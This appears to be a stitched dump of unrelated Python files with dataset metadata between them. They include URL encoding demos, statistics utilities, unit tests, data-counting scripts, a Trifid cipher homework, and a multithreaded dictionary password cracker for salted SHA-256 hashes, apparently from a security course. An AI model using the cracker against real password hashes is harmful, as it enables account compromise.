.quote:解码函数,将中文转换成%xxx
.unquote:编码函数,将%xxx转化成指定的字符
.unlencode:给一个字典,将字典拼接成query_string,并且实现自动编码的功能,(有些网址中不能出现非法的字符 )
"""
import urllib.parse
# image_url = 'https://gimg2.baidu.com/image_search/src=...'  (example of a
# URL full of percent-encoded characters, kept from the original demo)
#
# url = 'http://www.baidu.com/index.html?name=中国&pwd=123456'
# # Percent-encode the URL first, otherwise the request fails because it
# # contains characters that are illegal in a URL.
# reture = urllib.parse.quote(url)
# # Decode the %xx escapes back to the original characters.
# re = urllib.parse.unquote(reture)
# print(re)
# urlencode demo: build a query string from a dict with automatic encoding.
url = 'http://www.baidu.com/'
# Target result:
# url = 'http://www.baidu.com/index.html?name=中国&age=18&height=180&sex=nv&weight=180'
# How to assemble a URL like the one above:
name = '中国'
age = '18'
height = '180'
sex = 'nv'
weight = '180'
data = {
    'name': name,
    'age': age,
    'sex': sex,
    'height': height,
    'weight': weight,
}
# Looping over the dict by hand would normally look like this:
# lt = []
# for k, v in data.items():
#     lt.append(k + '=' + str(v))
# query_string = '&'.join(lt)
# This kind of URL assembly comes up all the time, but urllib.parse
# already wraps it (including the percent-encoding) for us:
query_string = urllib.parse.urlencode(data)  # the argument must be a dict
print(query_string)
url = url + '?' + query_string
print(url)
| true |
6fc01bd7a0854658f68d5f0877755c566518d2ba | Python | Pedroh097/Mi-Primer-Programa | /vocales_y_consonantes.py | UTF-8 | 441 | 3.984375 | 4 | [] | no_license |
# Count the periods, commas and spaces in a line of text typed by the user.
# NOTE(review): the file name suggests vowels/consonants, but the script
# actually counts punctuation and spaces.
texto_del_usuario = input("Dime una texto:")
puntos = "."
comas = ","
espacios = " "
n_puntos = 0
n_comas = 0
n_espacios = 0
# One pass over the text, bumping the matching counter for each character.
for signo in texto_del_usuario:
    if signo in puntos:
        n_puntos += 1
    if signo in comas:
        n_comas += 1
    if signo in espacios:
        n_espacios += 1
# Report the three counts.
print("Los puntos son {}".format(n_puntos))
print("Las comas son {}".format(n_comas))
print("Los espacios son {}".format(n_espacios))
| true |
214dbf422df8090499308cf1d7345136568935eb | Python | ViniciusLima94/PythonInformationTheoryModule | /infoPy/utils/tools.py | UTF-8 | 2,100 | 3.421875 | 3 | [] | no_license | import numpy as np
def silverman(Nvar, Nobs):
return (Nobs * (Nvar + 2) / 4.)**(-1. / (Nvar + 4))
def normalize_data(x):
#####################################################################################################
# Description: Normalize each column of the data matrix X
# > Inputs:
# x: Data matrix must have size [N_variables, N_observations].
# > Outputs:
# Normalized data
#####################################################################################################
from sklearn.preprocessing import StandardScaler
# Checking data shape
if x.shape[0] >= 1:
x = x.T
if len(x.shape) == 1:
x = x[np.newaxis, :].T
# Instantiate scaler object
scaler = StandardScaler()
# Fit on data
scaler.fit(x.T)
# Transform dada
x_norm = scaler.transform(x.T)
return x_norm.T
def KernelDensityEstimator(x, bandwidth, kernel = 'tophat', metric = 'euclidean', algorithm = 'auto'):
#####################################################################################################
# Description: Uses kernel estimaton to compute probabiliry distribution
# > Inputs:
# x: Data matrix must have size [N_variables, N_observations].
# bandwidth: Kernel bandwidth
# kernel: Kernel shape [‘gaussian’|’tophat’|’epanechnikov’|’exponential’|’linear’|’cosine’]
# metric: Distance metric to use [‘euclidean’|‘manhattan’|‘chebyshev’|‘minkowski’|]
# for more see: https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.DistanceMetric.html
# > Outputs:
# Probability distribution of the data obtained with kernel density estimation
#####################################################################################################
from sklearn.neighbors import KernelDensity
# Checking data shape
if x.shape[0] >= 1:
x = x.T
if len(x.shape) == 1:
x = x[np.newaxis, :].T
d = x.shape[0]
kde = KernelDensity(bandwidth=bandwidth, kernel=kernel, metric=metric, algorithm=algorithm)
if d == 1:
kde.fit(x)
p = kde.score_samples(x)
else:
kde.fit(x)
p = kde.score_samples(x)
return np.exp(p) | true |
9461ffece7f8a30b2496a1239cb5fc32c6e6f6c5 | Python | varunchodanker/ThreeAnimators | /tools/font_centering_pos.py | UTF-8 | 723 | 2.96875 | 3 | [
"MIT"
] | permissive | from manim import *
""" Contains dictionaries adjusting the position of letters of a particular
font, as ``Text(letter, font=...)`` centered with reference to a circle with
attr ``radius=0.5``
"""
FUTURA_CENTERING_POS = {
"A": 0.04 * UP, "B": 0.03 * RIGHT, "C": 0.04 * LEFT, "D": 0.04 * RIGHT,
"E": 0.01 * DOWN, "F": 0.02 * RIGHT + 0.01 * DOWN, "G": ORIGIN,
"H": 0.004 * RIGHT, "I": ORIGIN, "J": 0.035 * LEFT, "K": 0.025 * RIGHT,
"L": 0.025 * RIGHT, "M": 0.02 * UP, "N": ORIGIN, "O": ORIGIN,
"P": 0.035 * RIGHT + 0.01 * DOWN, "Q": ORIGIN, "R": 0.03 * RIGHT,
"S": ORIGIN, "T": 0.03 * DOWN, "U": 0.02 * DOWN, "V": 0.045 * DOWN,
"W": 0.05 * DOWN, "X": 0.01 * DOWN, "Y": 0.03 * DOWN, "Z": ORIGIN
} | true |
4e0d7e59f2f91d56c4f0fb77df6e827ec896e319 | Python | FelixSchwarz/smartconstants | /smart_constants_test.py | UTF-8 | 6,701 | 2.859375 | 3 | [
"MIT"
] | permissive | # -*- coding: UTF-8 -*-
# Copyright 2010-2013, 2017, 2019 Felix Schwarz
# The source code in this file is licensed under the MIT license.
from __future__ import absolute_import, print_function, unicode_literals
from pythonic_testcase import *
from smart_constants import attrs, BaseConstantsClass
class DummyConstants(BaseConstantsClass):
foo = "bar"
bar = "quux"
_fnord = "fnord"
def fnord(self):
return None
def skip_unless_enum_is_available():
try:
import enum
has_enum = True
except ImportError:
has_enum = False
if not has_enum:
skip_test('no enum module available')
class BaseConstantsClassTest(PythonicTestCase):
def test_ignores_private_names(self):
assert_not_contains("_fnord", DummyConstants.constants())
def test_ignores_functions(self):
assert_not_contains("fnord", DummyConstants.constants())
def test_can_get_names_of_all_defined_constants(self):
assert_equals(("foo", "bar"), DummyConstants.constants())
def test_can_get_values_of_all_defined_constants(self):
assert_equals(("bar", "quux"), DummyConstants.values())
def test_can_return_name_for_specified_value(self):
assert_equals("bar", DummyConstants.constant_for("quux"))
def test_can_return_enum_instance(self):
skip_unless_enum_is_available()
dummy_enum = DummyConstants.as_enum()
assert_equals('bar', dummy_enum.foo.value)
assert_equals('quux', dummy_enum.bar.value)
assert_false(hasattr(dummy_enum, '_fnord'))
dummy_enum2 = DummyConstants.as_enum()
assert_equals(
id(dummy_enum), id(dummy_enum2),
message='returned enum instance should be a singleton'
)
def test_provides_enum_methods(self):
skip_unless_enum_is_available()
assert_true(hasattr(DummyConstants, '__members__'))
dummy_enum = DummyConstants.as_enum()
assert_equals(dummy_enum.__members__, DummyConstants.__members__)
class CodesWithAttributes(BaseConstantsClass):
foo = 4, attrs(label="Foo")
bar = 5, attrs(label="Bar")
qux = 2, attrs(label="Quux")
class CodesWithHiddenAttributes(BaseConstantsClass):
foo = 4, attrs(label="Foo", visible=False)
bar = 5, attrs(label="Bar", visible=True)
class MethodAutoGenerationForBaseConstantsTest(PythonicTestCase):
def test_can_get_values_even_with_extended_attributes(self):
assert_equals((4, 5, 2), CodesWithAttributes.values())
def test_can_access_constants_as_attributes(self):
assert_equals(4, CodesWithAttributes.foo)
def test_can_get_constant_names_even_with_extended_attributes(self):
assert_equals(("foo", "bar", "qux"), CodesWithAttributes.constants())
def test_can_return_options_for_select(self):
assert_equals(((4, "Foo"), (5, "Bar"), (2, "Quux")),
CodesWithAttributes.options())
def test_hidden_constants_are_not_returned_for_select(self):
assert_equals(((5, "Bar"),), CodesWithHiddenAttributes.options())
def test_can_return_hidden_constant_if_it_is_the_current_value(self):
"""Sometimes it is desirable to allow certain values in a select field
even if the constant is usually hidden. For example some constants
should be phased out but existing data should be editable without the
need to change the current value."""
assert_equals(((5, "Bar"),), CodesWithHiddenAttributes.options())
options = CodesWithHiddenAttributes.options(current_value=CodesWithHiddenAttributes.foo)
assert_equals(((4, "Foo"), (5, "Bar")), options)
def test_can_get_label_for_value(self):
assert_equals("Foo", CodesWithAttributes.label_for(CodesWithAttributes.foo))
assert_equals("Quux", CodesWithAttributes.label_for(CodesWithAttributes.qux))
def test_uses_value_as_label_for_simple_constants(self):
assert_equals("quux", DummyConstants.label_for(DummyConstants.bar))
class ConstantWithEmptyValueTest(PythonicTestCase):
def test_can_define_optional_value_with_string_label(self):
class OptionalCode(BaseConstantsClass):
_ = 'empty'
foo = 4, attrs(label="Foo")
# the optional value does not use an attrs object, therefore ordering
# of constants is undefined (=> use a set for assertions)
assert_equals(set((None, 'foo')), set(OptionalCode.constants()))
assert_equals(set((None, 4)), set(OptionalCode.values()))
assert_equals(set(((None, 'empty'), (4, 'Foo'))),
set(OptionalCode.options()))
def test_can_define_optional_value_with_attrs(self):
class OptionalCode(BaseConstantsClass):
_ = None, attrs(label='empty')
foo = 4, attrs(label="Foo")
assert_equals((None, 'foo'), OptionalCode.constants())
assert_equals((None, 4), OptionalCode.values())
assert_equals(((None, 'empty'), (4, 'Foo')), OptionalCode.options())
def test_can_define_hidden_optional_value(self):
class OptionalCode(BaseConstantsClass):
_ = None, attrs(visible=False)
foo = 4, attrs(label="Foo")
assert_equals(((4, 'Foo'),), OptionalCode.options())
assert_equals(((None, None), (4, 'Foo')),
OptionalCode.options(current_value=None))
class ConstantWithCustomDataTest(PythonicTestCase):
def test_can_add_custom_data(self):
class OptionalData(BaseConstantsClass):
foo = 4, attrs(data=[1, 2, 3])
assert_equals([1, 2, 3], OptionalData.data_for(OptionalData.foo))
def test_can_add_custom_data_with_arbitrary_attribute_names(self):
data_as_list = attrs(data=[42, 21])
assert_equals([42, 21], data_as_list.data)
kw_only = attrs(answer=42, question=21)
assert_equals(
{'answer': 42, 'question': 21},
kw_only.data
)
data_as_dict = attrs(data={'answer': 42, 'question': 21})
assert_equals(
{'answer': 42, 'question': 21},
data_as_dict.data
)
def test_can_return_custom_data_in_options(self):
class CustomData(BaseConstantsClass):
foo = 4, attrs(data=u'foogroup')
bar = 7, attrs(group=u'bg', css=u'blue')
data_options = CustomData.options()
assert_equals(((4, None), (7, None)), data_options)
foo = data_options[0]
assert_equals('foogroup', foo.data)
bar = data_options[1]
assert_equals('bg', bar.group)
assert_equals('blue', bar.css)
| true |
79d806f7bfdac9865d287d05b58ceb9d936167aa | Python | taanh99ams/taanh-fundamental-c4e15 | /SS01/SS01 Asignment/multicircle.py | UTF-8 | 126 | 3.375 | 3 | [] | no_license | from turtle import *
color("green")
shape("turtle")
speed(500)
for i in range (6):
circle(100)
left(60)
mainloop()
| true |
b6d0537a4427212e55b349016eebbf3130c7c698 | Python | eomjinyoung/bigdata3 | /bit-python01/src08/calculator.py | UTF-8 | 172 | 3.484375 | 3 | [] | no_license | # 계산 모듈
def plus(a, b):
return a + b
def minus(a, b):
return a - b
def multiple(a, b):
return a * b
def divide(a, b):
return a / b
| true |
4569eb905a0b84c9f9d133f26764454154c5bf9c | Python | ushham/MScFireSpreadModel | /Fire_Locations/ConvexHull.py | UTF-8 | 1,412 | 2.8125 | 3 | [
"MIT"
] | permissive | import pandas as pd
import numpy as np
from scipy.interpolate import griddata
from Mapping_Tools import RasterConvert as rc
def CreateSurface(fileloc, filename, dumploc, coord1, coord2, sizex, sizey, boolian):
#Opens file, or expected df to be passed, and returns a sursafe of expected fire based on FRP
#Saves a raster of surface
#constants
lat = 'LATITUDE'
long = 'LONGITUDE'
conf = 'FRP'
#checks if file or df is passed
if boolian:
firedata = pd.read_csv(fileloc + '\\' + filename)
else:
firedata = fileloc
#set size of arrays
points = np.array(firedata[[lat, long]])
delx = abs(coord1[1] - coord2[1]) / sizex
dely = abs(coord1[0] - coord2[0]) / sizey
#create evenly spaced array given number of boxes
x = np.arange(min(coord1[1], coord2[1]), max(coord1[1], coord2[1]), delx)
y = np.arange(max(coord1[0], coord2[0]), min(coord1[0], coord2[0]), -dely)
grid_x, grid_y = np.meshgrid(x, y)
pointy = points[:, 0]
pointx = points[:, 1]
#create surface
#Check if there are enough points to make surface
if len(firedata.index) >= 4:
z = griddata((pointx, pointy), firedata[conf], (grid_x, grid_y), method='linear')
#Convert surface to raster file
rc.Convert2tif(z, dumploc, coord1, coord2, sizex, sizey, False)
else:
print('Not enough points at ' + dumploc)
return 0 | true |
45a6447dce9074212586d308f84bb677550882e9 | Python | rose317/miniweb | /demo_装饰器.py | UTF-8 | 323 | 3.140625 | 3 | [] | no_license | import time
def set_func(func):
def call_func():
start_time = time.time()
func()
stop_time = time.time()
print("函数总共运行时间%f" % (stop_time-start_time))
return call_func
@set_func
def test1():
print("这是test1")
for i in range(100000):
pass
test1() | true |
b1a97d28f4bf4184c57b1eb3dbfabd5e3b0beac1 | Python | xy990/bigdata | /boros/man0616.py | UTF-8 | 1,166 | 3.03125 | 3 | [] | no_license | #!/usr/bin/env python
import csv
import sys
reader = csv.reader(sys.stdin)
# Skip first row
next(reader, None)
brooklyn = {'2006':0,'2007':0,'2008':0,'2009':0,'2010':0,'2011':0,'2012':0,'2013':0,'2014':0,'2015':0,'2016':0}
for entry in reader:
BORO_NM = str(entry[13])
year = str(entry[1])
if BORO_NM == 'MANHATTAN':
if year[-4:] == '2006':
brooklyn['2006'] += 1
elif year[-4:] == '2007':
brooklyn['2007'] += 1
elif year[-4:] == '2008':
brooklyn['2008'] += 1
elif year[-4:] == '2009':
brooklyn['2009'] += 1
elif year[-4:] == '2010':
brooklyn['2010'] += 1
elif year[-4:] =='2011':
brooklyn['2011'] += 1
elif year[-4:] == '2012':
brooklyn['2012'] += 1
elif year[-4:] == '2013':
brooklyn['2013'] += 1
elif year[-4:] == '2014':
brooklyn['2014'] += 1
elif year[-4:] == '2015':
brooklyn['2015'] += 1
#else:
#brooklyn['else'] += 1
#else:
#brooklyn['invalid'] += 1
for k in brooklyn.keys():
print '%s\t%d' % (k,brooklyn[k])
| true |
1b14761c7a13ab3459e98462bee52802dcf4f123 | Python | quimey/itchallenge-2018 | /china/unshuffle4.py | UTF-8 | 744 | 2.578125 | 3 | [] | no_license | from PIL import Image
import os
import random
images = []
img = []
N = 200
for filename in os.listdir('sarasas'):
if len(images) >= N:
break
if filename[-3:] == 'pgm':
continue
try:
im = Image.open(os.path.join('sarasas', filename))
img.append(im)
images.append(im.load())
except OSError:
pass
def calc(b, d, i):
s = 0
for v in range(64):
s += abs(images[i][4 * b, v] - images[i][4 * d, v])
return s
vecs = {}
for b in range(16):
res = []
for d in range(16):
s = 0
for i in range(N):
s += calc(b, d, i)
res.append((s, d))
res.sort()
print(b)
for s, d in res[1: 3]:
print(d, s)
print("--")
| true |
e5ca0fc360330ef766c6cb85e5262aa270f1fe8c | Python | tonyfresher/graph-algo | /net_shortest_path/main.py | UTF-8 | 3,122 | 3.40625 | 3 | [] | no_license | from collections import deque
class Net:
@classmethod
def from_lists(self, lists):
net = self()
net.topology, net.weights = self._convert_lists_to_topology(lists)
return net
@staticmethod
def _convert_lists_to_topology(lists):
vertex_count = len(lists)
topology = {n: [] for n in range(1, vertex_count + 1)}
weights = {}
for v_from in range(vertex_count):
for i in range(0, len(lists[v_from]), 2):
v_to = lists[v_from][i]
topology[v_from + 1].append(v_to)
weights[(v_from + 1, v_to)] = int(lists[v_from][i + 1])
return topology, weights
def find_shortest_path(self, old_start, old_goal):
vertex_count = len(self.topology)
self.topology, self.weights, index = self._topsort(self.topology, self.weights)
reversed_index = {index[i]: i for i in index}
start, goal = index[old_start], index[old_goal]
distance, previous = {}, {}
distance[start] = 0
previous[start] = 0
for k in range(start + 1, vertex_count + 1):
distance[k] = float('inf')
previous[k] = start
for k in range(start, vertex_count + 1):
for v in self.topology[k]:
if distance[k] + self.weights[(k, v)] < distance[v]:
distance[v] = distance[k] + self.weights[(k, v)]
previous[v] = k
path = [goal]
node = goal
while (node != start):
node = previous[node]
path.append(node)
return [reversed_index[i] for i in path[::-1]], distance[goal]
@staticmethod
def _topsort(topology, weights):
stack = deque()
deg_in = {v: 0 for v in topology}
index = {}
for v in topology:
for w in topology[v]:
deg_in[w] += 1
for v in topology:
if deg_in[v] == 0:
stack.append(v)
number = 1
while stack:
node = stack.popleft()
index[node] = number
number += 1
for w in topology[node]:
deg_in[w] -= 1
if deg_in[w] == 0:
stack.append(w)
sorted_topology = {}
for v in topology:
sorted_topology[index[v]] = {index[w] for w in topology[v]}
topology = sorted_topology
weights = {(index[v], index[w]): weights[v, w] for v, w in weights}
return topology, weights, index
def main(args=None):
lists = [
[2, 1, 3, 5, 4, 3],
[3, 2, 5, 2, 6, 10],
[4, 10, 6, 10],
[6, 1, 7, 2],
[6, 15, 8, 12],
[7, 10, 8, 2],
[8, 15],
[],
[]
]
start, goal = 1, 8
net = Net.from_lists(lists)
path, weight = net.find_shortest_path(start, goal)
if weight != float('inf'):
print(path)
print(weight)
else:
print('There is no path between current start and goal')
if __name__ == '__main__':
main()
| true |
9a06d6372a0ac36597afefb34be9d6bc6ee014f9 | Python | axelfahy/rhinopics | /rhinopics/__main__.py | UTF-8 | 2,134 | 2.984375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""Entry point of the rhinopics cli."""
import os
import pathlib
import click
import click_pathlib
from tqdm import tqdm
from .rhinobuilder import RhinoBuilder
@click.command()
@click.argument('keyword', type=str, default=str(os.path.basename(os.getcwd())))
@click.option('--directory', '-d',
default='./', show_default=True,
type=click_pathlib.Path(exists=True, file_okay=False,
dir_okay=True, readable=True),
help='Directory containing the pictures to rename.'
)
@click.option('--backup', '-b', is_flag=True, show_default=True,
help='Create copies instead of renaming the files.'
)
@click.option('--lowercase', '-l', is_flag=True, default=True, show_default=True,
help='Modify the extension to lowercase.'
)
def main(keyword: str, directory: pathlib.PosixPath, backup: bool, lowercase: bool):
"""Rename all pictures in a directory with a common keyword.
The date from the metadata of the pictures is retrieved and concanated to the keyword,
followed by a counter to distinguish pictures taken the same day.
Parameters
----------
keyword : str
Common keyword to use when renaming the pictures.
The default value is the name of the current folder.
directory : str, default './'
Directory containing the pictures to rename, default is the current directory.
backup : bool, default False
If flag is present, copy the pictures instead of renaming them.
Examples
--------
$ rhinopics mykeyword
-> mykeyword_20190621_001
"""
paths = sorted(directory.glob('*'), key=os.path.getmtime)
nb_digits = len(str(len(paths)))
builder = RhinoBuilder(nb_digits, keyword, backup, lowercase)
with tqdm(total=len(paths)) as pbar:
for path in paths:
rhino = builder.factory(path)
if rhino is not None:
rhino.rename()
pbar.update()
if __name__ == '__main__':
main() # pylint: disable=no-value-for-parameter
| true |
ac28649a8bd8a01bf8fbd00cca71dda227a3edab | Python | Babnik21/Euler | /Euler 28.py | UTF-8 | 197 | 2.84375 | 3 | [
"MIT"
] | permissive | i = 2
stevilo = 1
vsota = 1
counter = 0
while stevilo < 1001*1001:
while counter < 4:
counter += 1
stevilo += i
vsota += stevilo
i += 2
counter = 0
print(vsota) | true |
d6c5da921684b727a04fa3e4c21c591bfe1cbbe2 | Python | jabulenc/CSProj-AtmBankSecurity | /p3/task4/Task4.py | UTF-8 | 1,881 | 2.640625 | 3 | [] | no_license | #!/usr/bin/python
import sys
import Queue
import threading
import time
import multiprocessing
import hashlib
import base64
exitFlag = 0
class myThread (threading.Thread):
def __init__(self, threadID, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.q = q
def run(self):
crack(self.q)
#New IDea - each thread makes its own buffer of hashed passwords
#compare existing hashes against those
def crack(q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
print 'getting new hash'
data = q.get()
print data
queueLock.release()
for pw in pws:
pw = pw.strip()
result = base64.b64encode(hashlib.sha256('CMSC414'+ pw +'Fall16').digest())
#print result
if data == result:
writelock.acquire()
outfile.write(pw+"\n")
writelock.release()
print pw
break
else:
continue
if data != result:
writelock.acquire()
outfile.write(data+"\n")
writelock.release()
else:
queueLock.release()
#time.sleep(1) May not need this line at all
pwfilename = sys.argv[1]
hashfilename = sys.argv[2]
cpus = multiprocessing.cpu_count()
queueLock = threading.Lock()
writelock = threading.Lock()
workQueue = Queue.Queue(100)
threads = []
pws = tuple(open(pwfilename, 'r'))
hashes = tuple(open(hashfilename, 'r'))
outfile = open('cracked.txt', 'w')
print cpus
# Fill the queue
queueLock.acquire()
for hash in hashes:
workQueue.put_nowait(hash.strip()) #strip all whitespace
queueLock.release()
# Create new threads
for x in xrange(cpus):
thread = myThread(x, workQueue)
thread.start()
threads.append(thread)
# Wait for queue to empty
while not workQueue.empty():
pass
# Notify threads it's time to exit
exitFlag = 1
outfile.close()
# Wait for all threads to complete
for t in threads:
t.join()
| true |
e6a19cb795f3aed10f2f535a73f1521125433268 | Python | wangyu33/LeetCode | /LeetCode1854.py | UTF-8 | 628 | 3.25 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File : LeetCode1854.py
# Author: WangYu
# Date : 2021/5/10
from typing import List
from collections import defaultdict
class Solution:
def maximumPopulation(self, logs: List[List[int]]) -> int:
d = defaultdict(int)
for b, death in logs:
for i in range(b, death):
d[i] += 1
maxn = 0
mdata = -1
for i in range(1950, 2051):
if d[i] > maxn:
mdata = i
maxn = d[i]
return mdata
logs = [[1993,1999],[2000,2010]]
s = Solution()
print(s.maximumPopulation(logs)) | true |
d03e356f6e4c11a3fe90272c106610017428ec77 | Python | lekhakpadmanabh/mlpy | /matching-book-abstract.py | UTF-8 | 1,205 | 2.671875 | 3 | [] | no_license | import nltk.stem
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
import scipy as sp
def grab_input():
titles = []
descrs = []
N = int(raw_input())
for i in xrange(N):
titles.append(raw_input())
breaker = raw_input()
for i in xrange(N):
descrs.append(raw_input())
return titles,descrs, N
titles,desc, N = grab_input()
english_stemmer = nltk.stem.SnowballStemmer('english')
class StemmedTfidfVectorizer(TfidfVectorizer):
def build_analyzer(self):
analyzer = super(TfidfVectorizer, self).build_analyzer()
return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))
tfidf = StemmedTfidfVectorizer(min_df=1, stop_words='english', analyzer='word', ngram_range=(1,3))
dvec = tfidf.fit_transform(desc)
def test(sample):
svec = tfidf.transform([sample])
sim = cosine_similarity(svec,dvec)
return np.argmax(sim)
t_indices = np.zeros(len(titles))
for i,d in enumerate(desc):
t_index = int(test(titles[i]))
t_indices[t_index]=i
t_indices = list(map(lambda x: x+1,map(int,t_indices.tolist())))
print '\n'.join(str(p) for p in t_indices)
| true |
9ee5ae25c5b9f77e7efcf2c36b0b88f9ad4adcad | Python | akitanak/try-fastapi | /try_fastapi/applications/tasks.py | UTF-8 | 883 | 2.71875 | 3 | [] | no_license | from typing import Dict, List
from try_fastapi.domains.entities.tasks import Priority, Task
class TaskService:
def add(self, task_dict: Dict) -> Task:
task = Task(
task_name=task_dict["task_name"],
due_date=task_dict.get("due_date"),
priority=task_dict.get("priority"),
)
return task
def list(self) -> List[Task]:
return [to_task(task) for task in tasks]
tasks = [
{"task_name": "歯を磨く"},
{"task_name": "顔を洗う", "priority": "high"},
{"task_name": "朝ごはんを食べる", "priority": "low"},
]
def to_task(task_dict: Dict) -> Task:
return Task(
task_name=task_dict["task_name"],
due_date=task_dict.get("due_date"),
priority=Priority.valueOf(task_dict.get("priority"))
if task_dict.get("priority") is not None
else None,
)
| true |
278039337016badc4915725b5d0c0a56c6fe9819 | Python | Minyus/utility_python_scripts | /print_progress.py | UTF-8 | 1,259 | 3.28125 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import sys
import time
def print_progress(iteration, total_iterations, update_interval_sec = 1.0):
global _time_started, _time_updated
t = time.time()
i = iteration
if i==0:
_time_started = _time_updated = t
elif ((t - _time_updated) > update_interval_sec) or i == (total_iterations - 1) :
_time_updated = t
t_elapsed = t - _time_started
i_ = i + 1
progress = i_ / total_iterations
progress_pct = 100 * progress
t_est_total = t_elapsed / progress
t_est_remained = t_est_total - t_elapsed
sys.stdout.write(f'\rProgress:{progress_pct: 5.2f} % ' \
+ f' | Processed:{i_: d}/{total_iterations: d} ' \
+ f' | Elapsed: {t_elapsed: 8.0f} sec' \
+ f' | Est total: {t_est_total: 8.0f} sec' \
+ f' | Est remained: {t_est_remained: 8.0f} sec' \
)
sys.stdout.flush()
if i == (total_iterations - 1):
print()
### Example ###
if __name__ == "__main__":
total_iterations = 100
for i in range(total_iterations):
print_progress(i, total_iterations) | true |
a588c904eaac17ac3c71cd3a056ab2cd87ecfb46 | Python | bcmi220/d2gpo | /examples/d2gpo/scripts/generate_d2gpo_distribution.py | UTF-8 | 3,400 | 2.609375 | 3 | [
"MIT"
] | permissive | import scipy.stats as stats
import sys
import numpy as np
import tqdm
from sklearn.utils.extmath import softmax
import h5py
import argparse
def scatter(a, dim, index, b): # a inplace
expanded_index = tuple([index if dim==i else np.arange(a.shape[i]).reshape([-1 if i==j else 1 for j in range(a.ndim)]) for i in range(a.ndim)])
a[expanded_index] = b
if __name__ == '__main__':
'''
'''
parser = argparse.ArgumentParser(description='Prior Distribution Generation')
parser.add_argument("--d2gpo_mode", type=str, default="")
parser.add_argument("--d2gpo_order_idx", type=str, default="")
parser.add_argument("--d2gpo_softmax_position", type=str, default="")
parser.add_argument("--d2gpo_softmax_temperature", type=float, default=1.0)
parser.add_argument("--d2gpo_distribution_output", type=str, default="")
parser.add_argument("--d2gpo_sample_width", type=int, default=200)
parser.add_argument("--d2gpo_gaussian_std", type=float, default=1)
parser.add_argument("--d2gpo_gaussian_offset", type=int, default=0)
parser.add_argument("--d2gpo_linear_k", type=float, default=-1)
parser.add_argument("--d2gpo_cosine_max_width", type=int, default=200)
parser.add_argument("--d2gpo_cosine_offset", type=int, default=0)
args = parser.parse_args()
mode = args.d2gpo_mode
assert mode in ['gaussian', 'linear', 'cosine']
if mode == 'gaussian':
std = args.d2gpo_gaussian_std
offset = args.d2gpo_gaussian_offset
mean = 0
distribution_func = stats.norm(mean, std)
elif mode == 'linear':
k = args.d2gpo_linear_k
assert k < 0
b = 1.0
offset = 0
assert (-b / k) >= (offset + args.d2gpo_sample_width)
elif mode == 'cosine':
max_width = args.d2gpo_cosine_max_width
offset = args.d2gpo_cosine_offset
assert max_width >= (offset + args.d2gpo_sample_width)
assert args.d2gpo_softmax_position in ['presoftmax', 'postsoftmax']
# load the order information
with open(args.d2gpo_order_idx, 'r', encoding='utf-8') as fin:
data = fin.readlines()
data = [[int(item) for item in line.strip().split()] for line in data if len(line.strip())>0]
assert len(data) == len(data[0])
if args.d2gpo_sample_width == 0:
args.d2gpo_sample_width = len(data)
x = np.arange(args.d2gpo_sample_width) + offset
if mode == 'gaussian':
y_sample = distribution_func.pdf(x)
elif mode == 'linear':
y_sample = k * x + b
else:
y_sample = np.cos(np.pi / 2 * x / max_width)
if args.d2gpo_softmax_position == 'presoftmax':
y_sample = y_sample / args.d2gpo_softmax_temperature
y_sample = softmax(np.expand_dims(y_sample,0)).squeeze(0)
y = np.zeros(len(data))
y[:args.d2gpo_sample_width] = y_sample
print(y[:args.d2gpo_sample_width])
label_weights = np.zeros((len(data), len(data)), dtype=np.float32)
for idx in tqdm.tqdm(range(len(data))):
sort_index = np.array(data[idx])
resort_index = np.zeros(len(data), dtype=np.int)
natural_index = np.arange(len(data))
scatter(resort_index, 0, sort_index, natural_index)
weight = y[resort_index]
label_weights[idx] = weight
f = h5py.File(args.d2gpo_distribution_output,'w')
f.create_dataset('weights', data=label_weights)
f.close()
| true |
164984416f3fd61a9d539f138bd76dc553dcac23 | Python | Bleak-bleak/CSE101 | /trifid.py | UTF-8 | 4,065 | 3.453125 | 3 | [] | no_license | # Your name:Xingtong Zhou
#
# Trifid Cipher (Homework 1-2) starter code
# CSE 101, Fall 2018
import string
# DO NOT MODIFY THIS HELPER FUNCTION!!!
def invert(source):
t = {}
for k in source:
t[source[k]] = k
return t
# COMPLETE THE FUNCTIONS BELOW FOR THIS ASSIGNMENT
def buildEncipheringTable(key):
new_key=key.upper()
new_key=new_key.replace(" ","")
available=list(string.ascii_uppercase)+["!"]
lookup=[1,[],[],[]]
track=1
for i in new_key:
if i in available:
available.remove(i)
lookup[track].append(i)
if len(lookup[track]) == 9:
track += 1
for y in available:
lookup[track].append(y)
if len(lookup[track]) == 9:
track += 1
empt_dic={}
for x in range(1,4):
for z in lookup[x]:
firstDigit= x
letterIndex= lookup[x].index(z)
secondDigit=(letterIndex//3)+1
thirdDigit=(letterIndex%3)+1
empt_dic[z]=firstDigit*100+secondDigit*10+thirdDigit
return empt_dic
def encipher(message, key):
trig = buildEncipheringTable(key)
row_1=""
row_2=""
row_3=""
new_message= message.replace(" ","").upper()
for a in new_message:
letter = str(trig[a])
row_1 = row_1 + letter[0]
row_2 = row_2 + letter[1]
row_3 = row_3 + letter[2]
reverse = invert(trig)
combi = ""
final = ""
b=0
for n in range(len(row_1)):
combi += row_1[b:b+5] + row_2[b:b+5] + row_3[b:b+5]
row_1 = row_1[b+5:]
row_2 = row_2[b+5:]
row_3 = row_3[b+5:]
message=""
left=0
while b < len(combi)/3:
chunks = int(combi[left:left+3])
left += 3
b += 1
message += reverse[chunks]
while len(message)%5 != 0:
message += "X"
add=[]
d=0
for e in range(int(len(message)/5)):
add.append(message[d:d+5])
d += 5
result=" ".join(add)
return result
# DO NOT modify or remove the code below! We will use it for testing.
if __name__ == "__main__":
# Testing Part 1
print('Testing buildEncipheringTable() with key "DRAGON"...')
table1 = buildEncipheringTable("DRAGON")
print('The trigram for "R" is:', table1["R"])
print('The trigram for "I" is:', table1["I"])
print('The trigram for "Z" is:', table1["Z"])
print()
print('Testing buildEncipheringTable() with key "NEPTUNE"...')
table2 = buildEncipheringTable("NEPTUNE")
print('The trigram for "B" is:', table2["B"])
print('The trigram for "J" is:', table2["J"])
